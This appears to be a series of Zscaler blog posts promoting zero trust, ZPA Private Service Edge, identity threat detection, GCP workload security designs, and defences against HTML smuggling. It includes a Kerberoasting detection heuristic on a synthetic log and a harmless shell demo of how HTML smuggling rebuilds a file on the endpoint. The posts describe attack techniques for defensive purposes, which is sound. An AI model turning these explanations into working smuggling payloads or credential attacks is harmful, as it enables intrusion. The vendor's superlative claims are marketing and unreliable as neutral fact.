Imagine a deep, dark cave. Within the cave, several individuals have been chained up for the entirety of their lives, and the only thing they have ever been able to see is the cave wall in front of them. Behind them is another group of people. This latter group is using the light from a fire, along with shapes and replicas of things that exist outside the cave, to cast shadows onto the aforementioned cave wall (take a look at the image below if you’d like some help visualizing things). When the prisoners see these shadows, they are left to believe that the shadows themselves are the “real things,” and that the shadows do not correspond to anything else. For example, if they see shadows of bird shapes, they assume that the shadows are what birds truly are; they do not know that what they see are just shadows cast by replicas that are designed to look like real things (real birds) that exist outside the cave. To see the true forms behind the shadows and the imitations casting them, one would need to leave the cave and behold reality in the light of the sun—where things are quite different. (If you would like to read more about this allegory, you can find a highly scholarly source here). What does this have to do with cybersecurity? Now, we can’t be sure that Plato was thinking about cybersecurity when he came up with the above allegory (although he almost certainly was). Either way, the allegory of the cave has clear applicability when it comes to our present topic. For decades, organizations have been shown the shadows of faulty replicas of what cybersecurity actually is. They have been led to believe that what they are seeing is the “true form” of how security is supposed to look. Specifically, they have been presented continually with hub-and-spoke networks guarded by castle-and-moat security models. 
But this kind of architecture is a poor fit for the modern world, with its remote workers, cloud applications, and increasingly sophisticated cyberthreats that know how to take advantage of the security status quo. Today, these perimeter-based architectures have multiple, crucially important challenges:
They endlessly extend the network to more and more users, locations, devices, and clouds, expanding the attack surface available to cybercriminals
They enable cyberthreat infections and data loss because the appliances on which they are built lack the scalability necessary to inspect traffic (particularly encrypted traffic at scale) and enforce real-time security policies
They permit lateral threat movement by placing users and entities onto the network, where they can move from resource to resource and cause extensive damage
They also suffer from a variety of other challenges related to cost, complexity, operational inefficiency, poor user experiences, organizational rigidity, and more
Zero trust for true security
Zero trust is the security reality that makes the perimeter-based shadows and shapes pale in comparison. In fact, the truth is even harsher: perimeter-based architectures are not even shadows or shapes of zero trust, the true form of security. That's because zero trust is a fundamentally different architecture that separates security and connectivity from network access and delivers comprehensive security as a service from the cloud. As a result, it does not suffer from the aforementioned challenges of perimeter-based architectures.
With a zero trust architecture powered by the Zscaler Zero Trust Exchange, organizations can:
Minimize the attack surface by hiding devices and apps behind the Zero Trust Exchange, eliminating exploitable tools (e.g., firewalls and VPNs), and stopping endless network expansion
Stop compromise and data loss through high-performance, cloud-powered inspection of all traffic, including encrypted traffic at scale, to block threats and data loss in real time
Prevent lateral threat movement by connecting users, devices, and workloads directly, one to one, instead of connecting them to the network as a whole
Solve other critical challenges by decreasing complexity, increasing operational efficiency, enhancing user experiences, and improving organizational agility, all contributing to greater economic value
It's time to cast the shackles aside, depart from Plato's cave, and behold the true form of security in the light of day. It's time to embrace zero trust and never look back. Register for our upcoming webinar, "How to Reduce Cyber Risk While Embracing Digital Transformation," to learn more about zero trust architecture and how it is helping modern organizations solve their networking and security problems. You will also hear firsthand from a Zscaler customer as they discuss their benefits and learnings from embracing the Zero Trust Exchange. Wed, 10 Jan 2024 08:00:02 -0800 Jacob Serpa
Secure Private Access – ZPA Private Service Edge on Equinix Network Edge
In 2023, there has been a more than 37% increase in ransomware attacks. The average ransom payment for enterprises has surpassed $100,000, with an average demand of $5.3 million1. Even the White House laid down a mandate to curb such attacks, calling for organizations to bolster their security with zero trust. A zero trust architecture establishes a connection to the specified application only, not to the entire corporate network.
In the past, enterprises used remote access VPN technologies to connect remote workers to corporate applications. This approach expands the attack surface and results in lateral movement of threats across a company’s internal systems. A zero trust architecture, however, curtails such movements and eliminates the attack surface. Zscaler Private Access (ZPA) is the Zero Trust Network Access (ZTNA) platform that applies the principles of least privilege to give users secure, direct connectivity to private applications running on-prem or in the public cloud while eliminating unauthorized access and lateral movement. As a cloud native service built on a holistic security service edge (SSE) framework, ZPA can be deployed in a matter of hours to replace legacy VPNs and remote access tools. In exploring secure private access, many organizations have adopted ZPA Private Service Edge, in which a localized version of Zscaler Private Access (ZPA) is deployed within the customer’s data center. This has enabled Zscaler customers to access private applications regardless of the location of the user and the app, with reduced latency and secure access. Now, Zscaler and Equinix together bring the ZPA service on Equinix Network Edge. ZPA Private Service Edge on Equinix Network Edge ZPA Private Service Edge (PSE) is a service that supports localized brokering in the same customer environment where private applications are hosted, such as colocation. The ZPA on-premises service enforces policies and stitches together the connection between an authorized user and a specific private application. When branch users or home office users are looking to access an application that is running in a private cloud, the connection between the user and the application is made with ZPA Private Service Edge, which is the shortest path to connectivity. ZPA PSE is now available on Equinix Network Edge. 
This integration enables customers to host the ZPA service locally in the same environment where their private applications are hosted. The joint solution improves application performance by reducing latency, eliminating unnecessary hops that traffic would need to travel if the ZPA service were hosted in the public cloud. The ZPA PSE service on Equinix Network Edge offers many benefits to customers, including:

- Delivering a superior user experience: Connecting users directly to private apps eliminates slow, costly backhauling over legacy VPNs while continuously monitoring and proactively resolving user experience issues.
- Minimizing lateral movement: Applications are made invisible to the internet and unauthorized users, and IPs are never exposed thanks to inside-out connections.
- Enforcing least-privileged access: Application access is determined by identity and context—not an IP address—and users are never put on the network for access.
- Stopping attacks with complete inspection: Private app traffic is inspected inline to prevent the most prevalent web attack techniques.
- Agility: Easily scale resources up or down, depending on usage.
- Cloud cost optimization: Run enterprise applications and ZPA services while optimizing overall cloud costs.
- Performance: Minimize the impact on application performance by eliminating the need for additional hops.
- Resilience: Ensure uninterrupted business continuity during blackouts, brownouts, and black swan events.

Figure 1: Zscaler PSE on Equinix Network Edge

ZPA Private Service Edge manages the connections between a Zscaler Client Connector for remote or branch users, a Zscaler Branch Connector for IoT/OT devices or servers, and the App Connector. ZPA Private Service Edge deploys as a lightweight virtual machine that customers install within their own network environments. Once set up, ZPA Private Service Edge works in the same way as the ZPA cloud service.
Notable use cases of the joint solution include:

- Connectivity optimization: The fastest path of access for users.
- Disaster recovery: Continued access to critical apps during brownouts, blackouts, and black swan events.
- Regulatory compliance: Secure private access with a zero trust architecture for regulatory purposes.
- Global reachability: Extends Zscaler capabilities to more locations across the world.

Zscaler and Equinix Collaboration

Zscaler is a leader in cloud security, counting more than 40% of the Fortune 500 among its customers, with 12+ years running a cloud service that sits in the data path at a proven scale of more than 320 billion transactions. Globally, Zscaler has more than 5,600 customers and global revenue exceeding $1.5 billion in 2022. We’re combining these capabilities with Equinix, the world’s digital infrastructure company®, which has the most dynamic global ecosystem of 10,000+ companies, including 55%+ of the Fortune 500, and 460,000+ physical and virtual interconnections. Equinix is the world’s most expansive, secure, and sustainable data center platform, with $7.2B+ of global revenue in 2022. Zscaler and Equinix have been collaborating for 12+ years to accelerate cloud transformation for customers. Through this partnership, customers get global coverage with data centers in 32 countries across six continents. Together, Zscaler and Equinix enable customers to have an optimized connectivity experience, so users can focus on enabling the business. ZPA Private Service Edge on Equinix Network Edge is generally available today. Please reach out to the Zscaler account team to request a demo. For more details on the solution, please visit:

References:
1. Zscaler ThreatLabz 2023 Ransomware Report

Mon, 11 Dec 2023 08:00:01 -0800 Karan Dagar

Defend Against Ransomware & Identity-Based Attacks: Boost Your Cyber Defense with Zscaler ITDR™

Modern cyberattacks are diverse, use different tools and techniques, and target multiple points of entry.
Ransomware is still one of the top threats organizations face today, and it’s only getting worse as threat actors continue to employ new techniques such as identity threats. Identity-based attacks are a driving force behind ransomware, since a single point of attack can now provide attackers with a potentially life-changing opportunity. Cyberattackers are now after your identities.

Compromising Identities

Threats such as ransomware often use identity-based attack techniques. Attack techniques such as lateral movement and compromising valid credentials are typically used to move quickly to a more lucrative target in the organization and evade prompt detection. Threat actors are targeting enterprise Active Directory (and Azure AD) accounts to gain a foothold in a target’s environment. Cybercriminals have a variety of methods to gain access to identities. A leaked or stolen password can often be used to break into databases holding multiple credentials. In fact, passwords still account for 80% of all cyberattacks and are a growing concern among security professionals. Hackers often use automated scripts to try different stolen username and password combinations to take control of people’s accounts. When a user’s account gets compromised, they can fall victim to fraud, identity theft, unauthorized financial transactions, and other criminal activities. For instance, Kerberoasting is an identity attack technique used by cybercriminals to obtain valid Active Directory (AD) credentials. Kerberoasting attacks target AD service accounts because they often carry higher privileges and enable attackers to hide for extended periods of time. Kerberoasting attacks are also notoriously hard to detect amid daily telemetry, making them even more attractive to cybercriminals. Attackers use password exposures to compromise databases and execute data exfiltration attacks on endpoints.
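As an illustration of why Kerberoasting is so faint a signal in daily telemetry, one commonly documented heuristic is to count Kerberos service-ticket requests (Windows event 4769) that use the weaker RC4 encryption type (0x17) and flag accounts issuing an unusual number of them. The sketch below applies that heuristic to a synthetic, simplified log; the log format, threshold, and account names are hypothetical, and real ITDR engines use far richer signals than this.

```shell
# Synthetic, simplified event log: <requesting account> <event id> <ticket encryption type>
cat > kerb_events.log <<'EOF'
alice 4769 0x12
svc-scanner 4769 0x17
svc-scanner 4769 0x17
svc-scanner 4769 0x17
svc-scanner 4769 0x17
bob 4769 0x12
EOF

# Heuristic: flag accounts with 3+ RC4 (0x17) service-ticket requests,
# a pattern consistent with Kerberoasting tooling.
awk '$2 == "4769" && $3 == "0x17" { n[$1]++ }
     END { for (a in n) if (n[a] >= 3) print "suspect:", a, n[a] }' kerb_events.log
```

A single noisy account stands out in this toy data, but in production the same request pattern is buried among millions of legitimate ticket requests, which is exactly the visibility gap described above.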
Identity tools don’t detect these incidents, leaving security teams with no way to learn about a compromised credential or password exposure.

Lateral Movement Fuels Cyberattacks

Once an attacker gets their hands on a user or identity, all they have to do is present the stolen credentials to the identity provider responsible for user authentication, and the lateral movement begins. That’s why lateral movement poses such a significant identity threat: attackers hold stolen user credentials and can pull further credentials out of compromised machines, allowing them to log in to multiple machines in the same environment, distribute a ransomware payload, or encrypt multiple machines at once. Security teams lack visibility, and there are no tools in their stack that can discover or alert on all these incidents in an environment, which is alarming since the attacker is operating with legitimately issued AD credentials. Attackers relentlessly seek to compromise service accounts, which often have high privileges, so that they can conduct lateral movement virtually undetected and easily access multiple machines and systems.

Sealing the Identity Gaps

Identity compromise is the most common starting point for a breach, so identity threat detection is often the first alarm that goes off. Now, these crucial early indicators are made possible with Zscaler ITDR™. Zscaler ITDR provides security teams with the visibility and protection they need for their identity management systems. You can detect identity-based attacks and identify anomalous credential abuse, attempts at privilege escalation, and lateral movement.

Reducing Risk with Actionable Insights, for Better Response

Zscaler ITDR automatically surfaces hidden risks that might otherwise slip through the cracks, such as unmanaged identities, misconfigured settings, and even credential misuse.
The solution offers organizations visibility and autonomous response capabilities, continuously assessing AD misconfigurations, vulnerabilities, and active threats in real time and giving prescriptive guidance to close exposures and gaps in customer AD environments. Restrict or terminate the identities causing trouble and shut down threats before they have a chance to wreak havoc. You can also respond with misdirection and deception. For example, when the solution detects an identity-based attack, it can serve fake data that redirects and lures the attacker to a decoy using Zscaler Deception. Zscaler provides a deception environment of decoy systems and data mimicking production assets to misdirect attacks, engage attackers, and collect information on adversary tactics, techniques, and procedures (TTPs). Zscaler automatically isolates the compromised system conducting the identity-based attack from the rest of the environment, limiting its interaction to the decoy environment. In addition, Zscaler ITDR is integrated into the Zscaler Zero Trust Exchange, which dynamically applies access policy controls to block compromised users when an identity attack is detected. This prevents the attacker from moving laterally across systems and further checks the spread of ransomware.

Conclusion

While breaches are inevitable and preventative security measures alone are not enough, Zscaler boosts your cyber defense stack against identity attacks. Zscaler ITDR delivers complete visibility in a single pane of glass and helps your security teams detect and respond, in real time, to emerging identity threats in your environment, including ransomware and sophisticated identity attacks. Read more about our ITDR technology here.
Tue, 05 Dec 2023 08:49:16 -0800 Nagesh Swamy

Demystifying Workload Security in Google Cloud Platform

Deploying and configuring cloud workload security shouldn’t be so difficult. If you’re still working with the complex traditional way of deploying and managing legacy firewalls or VPNs in the cloud, it’s high time to move on and look at Zscaler Workload Communications. Zscaler Workload Communications has now expanded its support to Google Cloud, one of the most widely adopted clouds, alongside AWS and Microsoft Azure.

How it works

Before we jump into design options for Workload Communications on Google Cloud, if you need a quick refresher on Zscaler Cloud Connector (VMs that facilitate secure egress traffic for cloud workloads and enable Workload Communications), you can read about it here.

Workload Communications on Google Cloud Platform

Let’s take a closer look at different Google Cloud networking design options as well as the pros and cons of each design. Google Cloud has an interesting feature called Shared VPC Architecture, or Shared Project, which gives the Networking team great flexibility to centralize cloud security management and control. Using Shared VPC Architecture, developers can focus on development while the Networking team completely manages and controls networking. Using Shared VPC Architecture in Google Cloud is a recommended best practice. For more information, check out Shared VPC | Google Cloud.

Google Cloud Provisioning Responsibilities:
- Shared Project (Host Project): Owned by the networking team; includes complete network constructs like the Shared VPC, subnets, routing, and more. Cloud Connector instances are part of this project. Network resources in the Shared Project are shared with Service Projects (for example, subnets are shared with different Service Projects).
- App Project (Service Project): Owned by the development team.
Owners use whatever network resources are shared by the Shared Project to deploy instances in App Projects.

Single Shared VPC Regional Cloud Connector Design

This design is based on a Single Shared VPC where:
- The workloads and Cloud Connectors are part of the same VPC but different Projects
- Cloud Connectors are part of a Shared Project under the complete control of the Networking team
- Subnets from this Shared VPC are shared with Service Projects for developers to deploy app VMs or serverless apps

A VPC in GCP is a global construct that can span all supported regions. In most cases, if you want to avoid VPC peering and use a plain Single Shared VPC for each environment (Prod, UAT, Dev, Pre-Prod, etc.), you can proceed with this design. By default, Google Cloud doesn’t allow subnet-to-subnet communication inside the same VPC. Therefore, even though the workloads and Cloud Connectors are part of the same VPC, you still have access control at the subnet level using Google Cloud firewall rules, and you can span multiple regions with a single VPC since it’s a global construct in GCP.

Pros and cons of this design:

Pros:
- Zscaler Cloud Connectors are deployed regionally—workloads can access the internet using regional Cloud Connectors along with regional load balancers. Provides a low-latency solution.
- Avoids cross-region traffic flows, optimizing customer costs.
- Plain vanilla design with a Single Shared VPC per environment.
- Decentralized design improves fault tolerance.
- Enables grouping and sharing of Cloud Connector instances at the region level.
- Minimal VPCs or VPC peerings, as workloads and Zscaler Cloud Connectors are part of the same VPC.

Cons:
- Requires network tags for workloads to forward traffic to regional Cloud Connectors. Automation pipelines should be in place for tagging workloads.
- Requires strong IAM controls, as Project-level network tags can be changed at any time by the Project owner or editor. Tag edits could impact traffic flow for the specific instance.
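The tag-based forwarding referred to in the cons can be sketched with the gcloud CLI. In this hedged example, a default route sends traffic from instances carrying a hypothetical workload tag to the internal load balancer fronting the regional Cloud Connectors; every name, region, and the forwarding-rule reference below is an illustrative assumption, not a Zscaler-prescribed value.

```shell
# Hypothetical names throughout; adjust to your environment.
# GCP routes support an ILB next hop (--next-hop-ilb) and can be scoped
# to instances carrying specific network tags (--tags).
gcloud compute routes create cc-egress-us-central1 \
    --network=shared-vpc \
    --destination-range=0.0.0.0/0 \
    --next-hop-ilb=cc-ilb-forwarding-rule \
    --next-hop-ilb-region=us-central1 \
    --tags=workload-us-central1 \
    --priority=800

# Tag a workload VM so it picks up the route above.
gcloud compute instances add-tags app-vm-1 \
    --zone=us-central1-a \
    --tags=workload-us-central1
```

Because anyone with edit rights on the Project can change instance tags, the IAM caveat above applies directly to the second command.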
Single Shared VPC Centralized Cloud Connector Design

This design is similar to the first, except Cloud Connectors are hosted in a centralized location while workloads can be part of different regions. As a Single Shared VPC design with cross-regional access, it is mostly used when workloads span multiple regions and you want to group geographically close regions to send traffic through a centralized location. This avoids the need to deploy and manage Cloud Connectors in each region for geographically close workloads.

Pros and cons of this design:

Pros:
- Easy to deploy, with no need for any network tags for workloads.
- Plain vanilla design with a Single Shared VPC per environment.
- Simple routing changes with two default routes: one for workloads without any network tags, and another for Cloud Connectors, with tags, pointing to the internet gateway.

Cons:
- Cross-region traffic flow design: no low latency and no fault tolerance.
- Cross-regional traffic flow costs need to be accounted for in this design.
- Cloud Connectors are deployed centrally in a single region.

Multi-VPC Shared VPC Cloud Connector Design

This design is mainly for cases where you want VPC-level isolation for each Project in your organization. Because Google doesn’t support a transitive VPC architecture yet, this design requires you to configure hub-and-spoke VPC peering as well as peering between Workload VPCs. Once again, the VPCs are completely managed by the Networking team as part of the Shared Project ownership, and these VPCs are shared with Spoke Projects along with peering and routing. As part of routing, you just need to make sure to export/import the default route from the Hub VPC to the Spoke VPCs.

Pros and cons of this design:

Pros:
- Easy to deploy, with no need for any network tags for workloads.
- Simple routing changes with two default routes: one for workloads without any network tags, and another for Cloud Connectors, with tags, pointing to the internet gateway.
- VPC-level isolation for each Project.
Cons:
- VPC peering is required between Workload VPCs and Cloud Connector VPCs. Google has a limit on the number of VPC peerings and doesn’t support transitive traffic, and thus requires VPC peering for any traffic flow.
- Complex routing changes, depending on the traffic flow requirements.

Conclusion

Every design has pros and cons depending on your organization's requirements. Whichever design you choose, Zscaler Workload Communications provides the flexibility to secure it seamlessly, with complete automation support using Terraform. There’s no need for Trust/Untrust VPCs—Zscaler Cloud Connectors can be deployed as part of a Single Shared VPC shared across workloads, or as part of an isolated VPC, as described in the designs above. If your organization is looking for seamless multicloud security with unlimited scale for firewall, proxy, TLS decryption, DLP, and more, look no further than Zscaler Workload Communications. To learn more, visit our product page. You can also sign up for our self-guided hands-on lab. Fri, 01 Dec 2023 08:01:01 -0800 Siripuram Pavan Kumar

Outsmart Evasive HTML Smuggling Attacks with AI-Powered Browser Isolation and Sandbox

HTML smuggling is a highly evasive malware delivery technique that exploits legitimate HTML5 and JavaScript features to evade detection and deploy remote access trojans (RATs), banking malware, and other malicious payloads. HTML smuggling bypasses traditional security controls like web proxies, email gateways, and legacy sandboxes. These attacks are difficult to stop and are just one of many inventive ways in which threat actors compromise organizations daily. The Zscaler Zero Trust Exchange protects against these attacks with natively integrated prevention capabilities for zero-day protection.

The Blueprint of HTML Smuggling

Attackers are able to hide malicious HTML smuggling activity within seemingly harmless web traffic, making it difficult for legacy security tools to detect and block the attack.
Most modern advanced prevention layers do not protect against HTML smuggling attacks because they look for malware or files being transacted between the end user’s browser and the webpage. When a user accesses a web page intended to deliver an HTML smuggling attack, the content exchanged between the user’s browser and the webpage is an immutable blob containing binary data and JavaScript, not a file. The JavaScript is executed in the user’s browser and, using the binary data in the immutable blob, the malicious file is constructed on the end user’s computer. Since no file is transferred over the wire, the attack goes unnoticed by legacy sandbox and anti-malware engines.

Zscaler Approach: Power of the Platform

As attackers continue to innovate with new and sophisticated threat vectors, organizations need to put in place dynamic, integrated, layered security controls to stop threats that have never been seen before. The Zscaler Zero Trust Exchange has been built with this goal in mind, providing defense in depth against new and evasive techniques, including HTML smuggling, patient-zero malware, and more. Zscaler products such as AI-powered Browser Isolation, natively integrated with AI-powered Sandboxing and Advanced Threat Protection (ATP), thwart such attacks comprehensively.

AI-powered Browser Isolation

Browser Isolation stops web-based threats in their tracks. It isolates suspicious web pages in the Zero Trust Exchange and streams only the real-time, safe pixels of the sessions to the end user, not the active content. This keeps threats from reaching endpoints, thereby disrupting the kill chain of modern-day browser exploits. It creates an air gap between users and the web while keeping the user experience intact. Risky internet destinations, whether accessed directly or via email URLs, can be configured via policy to be opened within Browser Isolation, and AI-powered Smart Isolation can accomplish that automatically.
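To see why nothing file-shaped crosses the wire, consider a toy stand-in for the client-side step: the page carries only encoded bytes, and the "file" first comes into existence on the endpoint. The shell sketch below mimics that reconstruction with a harmless base64 string; the payload and filename are made up for illustration, and a real attack would perform this step in browser JavaScript with a Blob and a triggered download.

```shell
# Encoded bytes as they might be embedded in a page's JavaScript
# (harmless text here; real attacks embed a malicious binary).
payload_b64="SGVsbG8sIHdvcmxkIQ=="

# Client-side reconstruction: only now does a file exist, on the endpoint.
printf '%s' "$payload_b64" | base64 -d > dropped.txt
cat dropped.txt
```

Any inspection engine watching the network sees only the encoded string inside page content, which is why detection has to happen either in an isolated browser or at the moment the reconstructed file touches the endpoint.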
Thus, any malicious payload delivered via HTML smuggling from these risky destinations is confined to the ephemeral container in the Zero Trust Exchange itself, protecting the endpoints.

Together with AI-powered Sandbox and ATP

For productivity reasons, the Browser Isolation profile may need to be configured to allow file downloads to the user’s endpoint, and a user may try to download such malware out of curiosity. Even in that scenario, the unique Zscaler architecture, with native integration of ATP and AI-powered Sandbox, will prevent the malware from reaching the endpoint. The dynamically generated malware could either have known signatures or be patient-zero. Either way, users will be protected.

Known Malware

Here are some examples of signatures (as seen in the Zscaler ThreatLabz Library) leveraged by ATP to block such malware:
- HTML.Downloader.SmugX (blocked by the Anti-Malware engine)
- JS.Dropper.GenericSmuggling (blocked by the Intrusion Prevention Service)
- JS.MalURL.Duri (blocked by the Intrusion Prevention Service)

Patient-Zero Malware

Zscaler’s AI/ML-driven Cloud Sandbox can stop unknown threats inline, preventing patient-zero malware from being downloaded to the endpoint.

Embark on the platform journey!

In a nutshell, attacks like HTML smuggling, no matter how evasive they may be, cannot escape the Zscaler Zero Trust Exchange. That’s the power of the platform! Experience the One True Zero!

Tech Tidbit - The Russian cybercriminal collective Nobelium – the group behind the SolarWinds attacks – is infamous for using HTML smuggling to deliver malware. Fri, 01 Dec 2023 08:00:02 -0800 Amit Jain

The SSE Accolades Keep on Coming

Secure Access Service Edge (SASE) has been grabbing headlines in the IT world over the past few years, and for good reason.
It helps organizations better support today’s flexible, location-agnostic working practices by combining various networking and security capabilities and providing a pathway to the adoption of zero trust principles. Although widely recognized as a goal to aim for, a number of organizations are choosing to start their journey with Security Service Edge (SSE), which is most simply described as SASE without the network re-architecting. SSE can sit on top of an existing network and immediately provide zero trust secure access to internet (SaaS) and private cloud applications. You can think of SSE as the fastest way to adopt zero trust with minimum disruption. Zscaler is a long-standing pioneer and leader in SSE, and today offers the largest, most mature, and scalable SSE platform on the market, with 150+ data centers worldwide processing (at the edge) more than 320 billion transactions and blocking 9 billion security incidents and policy violations every day. But don’t take our word for it. Industry research firms consistently recognize Zscaler as a leader in SSE, and three recent reports further extend our track record, demonstrating the power of our unique approach to zero trust.

- IDC calls out the reliability and performance of the Zscaler cloud¹ in the convergence of networking and security—Network Edge Security as a Service (NESaaS)
- Dell’Oro singles out Zscaler as the market share leader in SSE,² the security side of the secure access service edge (SASE)
- ISG points to Zscaler as a pioneer in the SSE market,³ focused on business risk and value as well as deep, context-led investigation

These reports provide valuable insights into emerging trends, market predictions, key challenges facing today’s CISOs and enterprises, and much more. See for yourself with complimentary access to all three reports.

1.
“IDC MarketScape: Worldwide Network Edge Security as a Service 2023 Vendor Assessment,” by Pete Finalle and Christopher Rodriguez, June 2023, IDC # US50723823. The IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of ICT suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. The Capabilities score measures vendor product, go-to-market, and business execution in the short term. The Strategy score measures alignment of vendor strategies with customer requirements in a 3-5-year timeframe. Vendor market share is represented by the size of the circles. Vendor year-over-year growth rate relative to the given market is indicated by a plus, neutral, or minus next to the vendor name.

2. “2021 & 2022 Market Share Leader Award for Security Service Edge (SSE),” presented by Dell’Oro Group, September 2023.

3. “ISG Provider Lens™ Quadrant: Cybersecurity – Solutions and Services | Security Service Edge (SSE),” by Information Services Group, LLC, June 2023.

Thu, 30 Nov 2023 08:00:01 -0800 Simon Tompson

Zscaler Data Protection named CRN’s “Product of the Year” in the Data Protection Category

It’s time to pop the champagne! We are thrilled to announce that Zscaler has been honored with the prestigious CRN "Product of the Year" award for data protection in the subcategory of customer need. This recognition is a testament to our relentless pursuit of innovation and commitment to delivering best-in-class solutions for our customers and partner ecosystem. We couldn't be more excited to accept this award and share our excitement about Zscaler Data Protection with you.

About the Award

The CRN Products of the Year Awards acknowledge top IT products and services that showcase cutting-edge technology in the industry.
These awards recognize innovative solutions that meet the evolving needs of the IT channel and its customers. For the 2023 edition, the CRN editorial team selected winners in 33 technology categories. To ensure fair judgment, the finalists were evaluated by solution providers with real-world expertise, who scored them based on factors like technology, revenue, profit, and customer demand. So without further ado, let's jump into our favorite category—data protection—and how Zscaler took home the prize in Data Protection for the subcategory of Customer Need.

Zscaler Data Protection Recognized as a Winner

CRN’s data protection award category covers a wide swath of concepts around data loss: from system failure and disaster recovery to cyberattacks and human error. It’s telling that Zscaler was called out in the subcategory of “Customer Need”. While system failure and disaster recovery are important to data hygiene, nothing is more top of mind and important to organizations than protecting data from malicious or accidental loss. Why did CRN and the channel community give Zscaler Data Protection the nod? Let's take a look.

Zscaler Data Protection: Stopping Malicious Exfiltration

One of the biggest challenges partners need to solve for their customers is the protection of distributed data. Data is the lifeblood of an organization, and keeping it safe is one of the main focus areas for CISOs and security architects. The challenge is that most organizations' security architecture simply isn't designed for data protection in a cloud and mobile world. However, with Zscaler’s cloud-delivered approach to data protection, that all changes. As a purpose-built SSE cloud platform, Zscaler has data protection as a core component of its architecture. Delivered from the cloud, all users, devices, and cloud apps are always routed through the Zscaler cloud. This ensures every transaction across an organization is always inspected and protected.
This allows organizations to retire costly appliances and data center security in favor of a more agile, cost-effective cloud-delivered model. Because the Zscaler Zero Trust Exchange consolidates all security services into one platform, security, data protection, and zero trust network access all live in harmony. Centralized across the Zscaler platform, IT administrators get one central policy architecture that streamlines user, device, and cloud app protection. With Advanced Threat Protection, DLP, CASB, SWG, ZTNA, Firewall, Sandboxing, and Digital Experience Monitoring, organizations get everything they need to ensure threat actors can’t steal their data or put them or their users at risk. While stopping external threats is key, sadly, organizations also need to keep internal malicious activity in check. Users often take data to their next job, or engage in suspicious behavior that hints at malicious activity. With Zscaler Endpoint DLP, organizations can lock down devices so USB, network shares, and printing don’t pose a risk to data, while advanced UEBA helps quickly identify user behaviors that fall outside of norms - like bulk uploads or suspicious login activity.

Zscaler Data Protection: Preventing Accidental Data Loss

Great data protection also requires looking at what is sometimes your biggest liability - your users. After all, they are the ones handling your data, and they often don’t have the best data protection habits - or just don’t know better. This is another area in which Zscaler Data Protection excels. Securing data from accidental loss starts with inline inspection. Built around an enterprise-grade DLP engine, Zscaler’s cloud-delivered platform enables organizations to ensure all data—across all connections and SSL—is inspected for data loss. Even BYOD connections become less risky, as Zscaler Browser Isolation enables you to stream data as pixels, ensuring the actual data doesn’t land on an unmanaged BYOD device and walk away.
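As a toy illustration of the pattern-matching idea behind inline DLP (and nothing like the production engine, which layers dictionaries, exact data match, and ML classifiers on top), a naive check might flag an outbound file whose content matches simple source-code signatures. The file name and patterns below are hypothetical:

```shell
# Hypothetical file and patterns; illustrative heuristic only.
cat > sourcecode.c <<'EOF'
#include <stdio.h>
int main(void) { printf("build 42\n"); return 0; }
EOF

# Block the transfer when the content looks like C source code.
if grep -qE '#include <|int main\(' sourcecode.c; then
    echo "BLOCKED: outbound file matches source-code DLP pattern"
else
    echo "ALLOWED"
fi
```

The point of the sketch is placement, not sophistication: because an inline platform sits in the data path for every connection, even a simple content rule is evaluated before the bytes ever leave the organization.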
Because Zscaler is delivered inline across the organization, shadow IT and cloud app control become a snap. You can quickly see all unsanctioned app activity and shut down cloud apps that are deemed too risky for your data. For sanctioned cloud apps that you own, Zscaler CASB provides full control over data residing in platforms like Microsoft 365 or Google. IT teams can ensure risky data sharing by users is revoked, and leverage Zscaler’s security engines to quickly find and quarantine malware residing in your cloud apps. Lastly, Zscaler AppTotal and posture control enable you to scan your cloud and SaaS platforms for dangerous misconfigurations or third-party integrations and close these holes. As many of the largest data breaches have been due to misconfigurations, this is an important step in the data hygiene process.

Where do we go from here?

Winning a CRN award in the category of Data Protection is truly a fantastic accolade, so we do want to thank CRN for their recognition. We also feel nothing speaks more loudly than the testimonials of our customers. To that end, if you’d like to hear what they have to say, you can hear about their successes here. We also thank the channel community for their continued support and commitment to Zscaler. It’s humbling to be part of such a strong movement to help companies along their digital transformation journey. We promise to continue to innovate and deliver impactful solutions that solve real customer problems. Lastly, if you’re currently a Zscaler partner, please visit our partner portal, where you can learn more about selling Zscaler Data Protection. Mon, 04 Dec 2023 07:29:05 -0800 Steve Grossenbacher

New to Zero Trust? Start Here

Before joining Zscaler earlier this year, I was a networking guy. In fact, my entire career in IT was in some way linked to computer networking over a 25-year period, and I thought I knew all about security.
I was steeped in a world that defined security in terms of firewalls, VPNs, Network Access Control, and Intrusion Detection and Prevention. There were a lot of boxes, and a ton of complexity to work through. All that effort makes you feel like you must be secure, right? Then I became a Zscaler employee. Suddenly my world was turned upside down. Rather than starting with the network, connecting people, and then attempting to lock everything down, I began to see another perspective altogether. Assume everything is insecure, remove all notion of implicit trust, and connect only what is permitted and secure. It was a revelation. It was also the beginning of a journey. As anyone else who has made a similar transition, or started their cybersecurity journey will attest, there is a LOT to learn in this space. A lot of technology, and a mountain of new jargon. Fortunately, there are plentiful resources, no shortage of training courses and many helpful folks ready to share what they know, but here’s the thing. Here’s the big question on the minds of many in this situation: Where do I start? There’s no such thing as flicking a switch to transition from the familiar concepts of security (those firewalls and VPNs) to a zero trust architecture. It really is best thought of as a journey— both mental and practical. And as the old saying goes, every journey begins with a first step. We want to provide that first step and make it easy for you to get started on this exciting journey because we recognize how badly the world needs more cybersecurity skills. We understand the burning need to transition to an architecture that’s purpose-built for a world where users and applications are anywhere and everywhere. So we built a webinar and named it ‘Start Here: An Introduction to Zero Trust.’ And because we know the scale of the cybersecurity skills gap around the world, we consider it important enough to run every month. 
We also want to provide a live experience, with an opportunity to keep the content fresh and for our audience to ask questions in real time, so we're doing that too. While there's no way we can teach you all you need to know in one hour, we feel confident that you'll find the hour you spend with us entertaining and informative. You'll come away with a solid grasp of the basics so you can move on to more advanced topics, in line with your own goals. Look for the next episode on our webinars page, and book yourself a spot. If you can't make it on the day, fear not. This one is like a regularly scheduled bus. It won't be long before another one comes along; like I said, every month. We can't wait to welcome you! Wed, 29 Nov 2023 08:00:01 -0800 Simon Tompson The Ideal Becomes Reality: This Is What Zero Trust Should Look Like Over the past few years, it has become increasingly clear that the status quo for networking and security is no longer tenable. Endlessly extending hub-and-spoke networks to ever more remote users, branch offices, and cloud applications increases risk, harms the user experience, and is untenably complex and expensive. The same goes for relying on castle-and-moat security models to secure an expanding network with a growing number of security appliances. Zero trust has quickly established itself as the preferred answer to the problems of these perimeter-based architectures. Unfortunately, the enthusiasm around the zero trust concept has caused confusion about what the term actually means. Sometimes the principle is described as a specific feature or yet another appliance (whether hardware or 